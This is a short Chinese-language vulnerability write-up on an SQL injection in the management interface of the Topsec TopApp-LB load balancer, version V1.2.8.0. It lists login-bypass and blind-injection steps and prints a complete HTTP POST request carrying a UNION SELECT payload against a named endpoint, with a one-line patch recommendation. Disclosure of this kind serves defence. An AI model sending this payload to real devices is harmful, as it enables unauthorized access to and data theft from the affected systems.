目录
天融信TOPApp-LB负载均衡SQL注入
描述
天融信负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞,具体为在可以访问管理服务情况 下,攻击者通过构造恶意请求,利用系统检查输入条件不严格的缺陷,进一步可获取部分系统本地信息。
概述
天融信负载均衡系统(以下简称TopApp产品)是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均衡系统让大规模的应用部署轻松实现,同时达至最稳定的运行效果,最高的资源利用率,最佳的应用性能和用户体验。大量的企事业单位通过TopApp-LB负载均衡系统顺利实现了应用部署,满足了信息化发展的需求,并极大地提升了工作效率。
影响
V1.2.8.0#xxx ,该版本存在于 2014年之前销售的产品。
漏洞利用过程
前台绕过
- 抓包分析 /login_check.php 这是一段检查登录的包;仔细观察
- 查看用户名密码位置是否存在注入——绕过
- 查看返回包信息 200 ok
- DNSLOG 进行回显测试
- 进入主界面
注入
- 查找注入点进行检测
- 进行SQLMAP的尝试
- 使用手工进行盲注测试-布尔型
可以参考盲注代码:
https://blog.csdn.net/weixin_43650289/article/details/106992794
POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=t05cisbprlg0vb2b65j4e4sma5
Content-Length: 206
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@ 
修复建议
TopAPP-LB以上版本产品,进行升级改造或者打补丁
结束!!!
参考文章:。。。。
